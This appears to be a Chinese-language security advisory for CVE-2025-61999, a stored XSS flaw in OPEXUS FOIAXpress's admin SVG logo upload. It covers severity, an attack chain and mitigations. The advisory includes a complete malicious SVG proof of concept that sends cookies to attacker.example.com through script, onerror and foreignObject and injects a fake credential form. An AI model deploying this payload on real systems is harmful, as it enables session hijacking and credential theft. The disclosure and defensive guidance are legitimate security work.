CVE-2025-61999 OPEXUS FOIAXpress SVG存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-61999

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

OPEXUS FOIAXpress

漏洞概述

CVE-2025-61999是OPEXUS FOIAXpress（Freedom of Information Act Xpress，一款用于管理信息公开请求的企业级软件平台）中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞的CVSS 3.1评分为4.3分，严重等级为MEDIUM（中危），于2025年10月8日正式披露。

根据漏洞描述，FOIAXpress在11.13.3.0版本之前，允许具有管理员权限的用户上传包含JavaScript或其他可执行内容的SVG图像文件作为系统Logo。上传后的恶意内容会被持久化存储在服务器端，当其他用户（包括普通用户或其他管理员）查看包含该Logo的页面时，嵌入在SVG中的恶意脚本将在受害者浏览器的上下文中自动执行。

该漏洞的成功利用允许攻击者（拥有管理员权限的恶意用户或被入侵的管理员账户）在受害者的身份上下文中执行任意操作，包括但不限于窃取用户的会话Cookie、获取登录凭证、访问敏感数据，以及以受害者身份执行未授权的操作。由于FOIAXpress通常用于处理政府信息公开请求，其中包含大量敏感信息，因此该漏洞对数据机密性和完整性均构成潜在威胁。

该漏洞的CVSS向量表明其攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要高权限（PR:H），需要用户交互（UI:R），对机密性、完整性和可用性影响均为低级别（L:L:L）。

技术细节

该漏洞的核心原理在于FOIAXpress对用户上传的SVG图像文件缺乏充分的内容验证和过滤机制。SVG（Scalable Vector Graphics）是一种基于XML的矢量图形格式，与常见的位图格式（如PNG、JPG）不同，SVG文件本质上是一个XML文档，可以包含JavaScript脚本、事件处理器以及外部资源引用等可执行内容。

漏洞利用的技术流程如下：

1. **文件上传阶段**：攻击者（具有管理员权限）精心构造一个恶意的SVG文件，在其中嵌入JavaScript代码。常见的注入方式包括使用`<script>`标签、SVG事件处理器（如`onload`、`onclick`）或`<foreignObject>`标签嵌入HTML内容。由于系统未对SVG文件进行安全过滤，恶意文件被成功上传并存储为系统Logo。

2. **内容持久化**：上传的恶意SVG文件被存储在服务器端的文件系统中，并在后续页面渲染时被作为Logo资源引用。由于是存储型XSS，恶意代码会持续影响所有访问相关页面的用户。

3. **脚本执行阶段**：当其他用户（受害者）访问包含该恶意Logo的页面时，浏览器会解析SVG文件并执行其中嵌入的JavaScript代码。此时，恶意脚本运行在受害者的浏览器会话上下文中，拥有与正常页面相同的权限和访问能力。

4. **数据窃取与操作**：攻击者注入的脚本可以执行多种恶意操作，包括通过`document.cookie`窃取会话Cookie（若未设置HttpOnly标志）、构造伪造表单窃取用户凭证、利用AJAX请求以受害者身份执行操作，以及将敏感数据外传到攻击者控制的服务器。

该漏洞的利用前提是攻击者必须拥有管理员权限（PR:H），这在一定程度上限制了其攻击范围，但同时也意味着该漏洞可能被用于横向攻击——即一个被入侵的管理员账户可利用此漏洞攻击其他管理员或高权限用户，从而提升攻击影响。

攻击链分析

STEP 1

步骤1：获取管理员权限

攻击者通过社会工程学、凭据填充、钓鱼攻击或其他方式获取FOIAXpress系统的管理员账户凭据。由于漏洞利用需要高权限（PR:H），这是攻击的前置条件。

STEP 2

步骤2：构造恶意SVG文件

攻击者创建一个包含恶意JavaScript代码的SVG图像文件。代码被设计用于窃取会话Cookie、用户凭证或执行其他恶意操作。SVG文件看起来像正常的Logo图像，但内部嵌入了可执行脚本。

STEP 3

步骤3：上传恶意SVG作为系统Logo

攻击者利用管理员权限，通过FOIAXpress的系统设置或品牌定制功能，将恶意SVG文件上传为系统Logo。由于应用未对SVG内容进行安全验证，恶意文件被成功存储。

STEP 4

步骤4：等待受害者访问页面

恶意SVG文件被持久化存储在服务器中。当其他用户（包括其他管理员、普通用户或外部审计人员）访问包含该Logo的任何页面时，浏览器将自动加载并解析SVG文件。

STEP 5

步骤5：恶意脚本执行

浏览器解析SVG文件时执行其中嵌入的JavaScript代码。脚本在受害者的会话上下文中运行，可以访问document.cookie、发起AJAX请求、修改DOM内容等。

STEP 6

步骤6：数据窃取与权限提升

恶意脚本将窃取的会话Cookie、凭证或其他敏感数据发送到攻击者控制的服务器。攻击者可利用窃取的会话信息冒充受害者身份执行操作，实现横向移动或权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-61999 PoC: Malicious SVG file with embedded JavaScript -->
<!-- This SVG file, when uploaded as a logo in OPEXUS FOIAXpress, will execute JavaScript in the context of any user viewing the affected page -->

<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200" viewBox="0 0 200 200">
  <rect x="0" y="0" width="200" height="200" fill="#ffffff"/>
  <text x="100" y="100" text-anchor="middle" fill="#000000">Company Logo</text>
  
  <!-- Method 1: Inline script execution via onload event -->
  <script type="text/javascript">
    // Exfiltrate session cookies to attacker-controlled server
    var attackerServer = "https://attacker.example.com/steal";
    var stolenData = {
      cookies: document.cookie,
      url: window.location.href,
      referrer: document.referrer,
      userAgent: navigator.userAgent,
      timestamp: new Date().toISOString()
    };
    
    // Send stolen data to attacker's server
    var img = new Image();
    img.src = attackerServer + "?data=" + encodeURIComponent(JSON.stringify(stolenData));
    
    // Create a fake login form to steal credentials
    var fakeForm = document.createElement('form');
    fakeForm.method = 'POST';
    fakeForm.action = attackerServer + '/credentials';
    fakeForm.innerHTML = '<input name="username"><input name="password">';
    document.body.appendChild(fakeForm);
  </script>
  
  <!-- Method 2: Event handler based XSS -->
  <image xlink:href="x" onerror="fetch('https://attacker.example.com/log?cookie=' + document.cookie)"/>
  
  <!-- Method 3: Using foreignObject to embed HTML/JS -->
  <foreignObject x="0" y="0" width="200" height="200">
    <body xmlns="http://www.w3.org/1999/xhtml">
      <iframe src="javascript:parent.location='https://attacker.example.com/phishing?cookie='+document.cookie" width="0" height="0"/>
    </body>
  </foreignObject>
</svg>

影响范围

OPEXUS FOIAXpress < 11.13.3.0

防御指南

临时缓解措施

在无法立即升级到11.13.3.0版本的情况下，建议采取以下临时缓解措施：1）限制管理员上传Logo的权限，仅允许受信任的管理员进行Logo更改操作；2）在Web应用防火墙（WAF）中添加规则，阻止包含JavaScript代码或事件处理器的SVG文件上传；3）部署Content-Security-Policy策略，限制内联脚本执行；4）为所有用户会话Cookie添加HttpOnly标志，降低Cookie窃取风险；5）监控和审计所有Logo文件的更改记录，及时发现可疑的上传行为；6）对现有Logo文件进行安全审查，确保其中不包含恶意代码。